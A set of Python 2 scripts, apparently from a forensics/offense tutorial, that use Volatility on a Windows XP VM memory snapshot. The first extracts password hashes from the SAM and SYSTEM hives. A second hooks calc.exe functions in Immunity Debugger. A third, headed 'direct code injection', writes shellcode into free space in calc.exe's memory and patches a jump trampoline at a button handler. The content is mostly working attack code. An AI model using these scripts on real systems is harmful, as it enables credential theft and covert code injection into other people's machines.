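import sys
import struct

# Memory snapshot to analyse (a VMware .vmem of the lab guest).
memory_file = "WinXPenSP3-Snapshot8.vmem"

sys.path.append("C:\\Python27\\volatility-2.3.1")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

config.parse_options()
# NOTE(review): profile name copied from the page; if Volatility reports
# "no suitable address space", check it against `vol.py --info`.
config.PROFILE = "WinXPenSP3x86"
# The page spelled this attribute "LOCALTION"; Volatility 2.x reads
# config.LOCATION, so the misspelling would have been silently ignored and
# no image opened.
config.LOCATION = "file://%s" % memory_file

registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)

from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump

# Use a distinct name for the API instance so the volatility.registry module
# imported above is not shadowed.
regapi = RegistryApi(config)
regapi.populate_offsets()

sam_offset = None
sys_offset = None

# all_offsets maps hive offset -> hive path; locate the SAM and SYSTEM hives.
for offset, hive_path in regapi.all_offsets.items():
    if hive_path.endswith("\\SAM"):
        sam_offset = offset
        print "[*] SAM: 0x%08x" % offset

    if hive_path.endswith("\\system"):
        sys_offset = offset
        print "[*] System: 0x%08x" % offset

    if sam_offset is not None and sys_offset is not None:
        config.sys_offset = sys_offset
        config.sam_offset = sam_offset

        hashdump = HashDump(config)
        for entry in hashdump.calculate():
            print entry

        # Both hives located and dumped: no need to scan further. (The
        # indentation of this `break` was lost in the pasted page; placing
        # it at loop level ends the hive scan rather than truncating output.)
        break

if sam_offset is None or sys_offset is None:
    print "[*] Failed to find the system or SAM offsets."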

直接代码注入

from immlib import *

class cc_hook(LogBpHook):
    """Logging breakpoint hook that reports an address once, then removes itself."""

    def __init__(self):
        LogBpHook.__init__(self)
        self.imm = Debugger()

    def run(self, regs):
        """Invoked by Immunity Debugger when the breakpoint fires.

        Logs the current EIP and deletes the breakpoint at that address so it
        does not fire again.
        """
        hit_addr = regs['EIP']
        self.imm.log("%08x" % hit_addr, hit_addr)
        self.imm.deleteBreakpoint(hit_addr)
        return


def main(args):
    """Place a one-shot logging breakpoint on every function found in calc.exe.

    Returns a short status string for the debugger's log window.
    """
    imm = Debugger()
    calc = imm.getModule("calc.exe")
    codebase = calc.getCodebase()
    imm.analyseCode(codebase)
    functions = imm.getAllFunctions(codebase)

    hooker = cc_hook()
    for func_addr in functions:
        hooker.add("%08x" % func_addr, func_addr)

    return "Tracking %d functions." % len(functions)
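#coding=utf-8
import sys
import struct

# Virtual address of the target instruction inside calc.exe (value from the page).
equals_button = 0x01005D51
memory_file = "WinXPenSP3-Snapshot8.vmem"

slack_space = None
trampoline_offset = None
tramp = None

# Read the code to be written into the snapshot (binary: raw bytes, not text).
with open("cmeasure.bin", "rb") as sc_fd:
    sc = sc_fd.read()

sys.path.append("C:\\Python27\\volatility-2.3.1")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

config.parse_options()
config.PROFILE = "WinXPSP3x86"
# The page spelled this attribute "LOCALTION"; Volatility 2.x reads
# config.LOCATION, so the misspelling would leave no image configured.
config.LOCATION = "file://%s" % memory_file

import volatility.plugins.taskmods as taskmods

p = taskmods.PSList(config)

for process in p.calculate():
    if str(process.ImageFileName) != "calc.exe":
        continue

    print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
    print "[*] Hunting for physical offsets...please wait."

    address_space = process.get_process_address_space()
    pages = address_space.get_available_pages()

    # Each page is (virtual address, size); vtop gives its physical offset
    # in the snapshot file, or None if the page is not resident.
    for page in pages:
        physical = address_space.vtop(page[0])
        if physical is None:
            continue

        if slack_space is None:
            # Binary mode is required: the original "r+" is text mode, which on
            # Windows translates line endings and corrupts both the offsets
            # computed from buf and the bytes written back.
            with open(memory_file, "r+b") as fd:
                fd.seek(physical)
                buf = fd.read(page[1])
                try:
                    offset = buf.index("\x00" * len(sc))
                except ValueError:
                    # No null run large enough in this page; try the next one.
                    offset = None

                if offset is not None:
                    slack_space = page[0] + offset
                    print "[*] Found good shellcode location!"
                    print "[*] Virtual address: 0x%08x" % slack_space
                    print "[*] Physical address: 0x%08x" % (physical + offset)
                    print "[*] Injecting shellcode."
                    fd.seek(physical + offset)
                    fd.write(sc)

                    # 7-byte stub: mov ebx, <virtual address of sc> ; jmp ebx
                    tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
                    tramp += "\xff\xe3"

                    if trampoline_offset is not None:
                        break

        # Does this page contain the target instruction? The -7 keeps the
        # 7-byte stub from crossing the page boundary.
        if page[0] <= equals_button < (page[0] + page[1]) - 7:
            print "[*] Found our trampoline target at: 0x%08x" % physical
            # Page-relative (virtual) offset of the target; the page had "="
            # here instead of "-", which assigned page[0] to both names.
            v_offset = equals_button - page[0]
            # Physical offset of the target in the snapshot file.
            trampoline_offset = physical + v_offset
            print "[*] Found our trampoline target at: 0x%08x" % trampoline_offset

            if slack_space is not None:
                break

    if trampoline_offset is None or tramp is None:
        # Without both locations fd.seek(None) would raise a TypeError.
        print "[*] Failed to find slack space or the trampoline target."
    else:
        print "[*] Writing trampoline..."
        # The page closed an undefined name `f` here; close the handle we opened.
        with open(memory_file, "r+b") as fd:
            fd.seek(trampoline_offset)
            fd.write(tramp)
        print "[*] Done injecting code."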
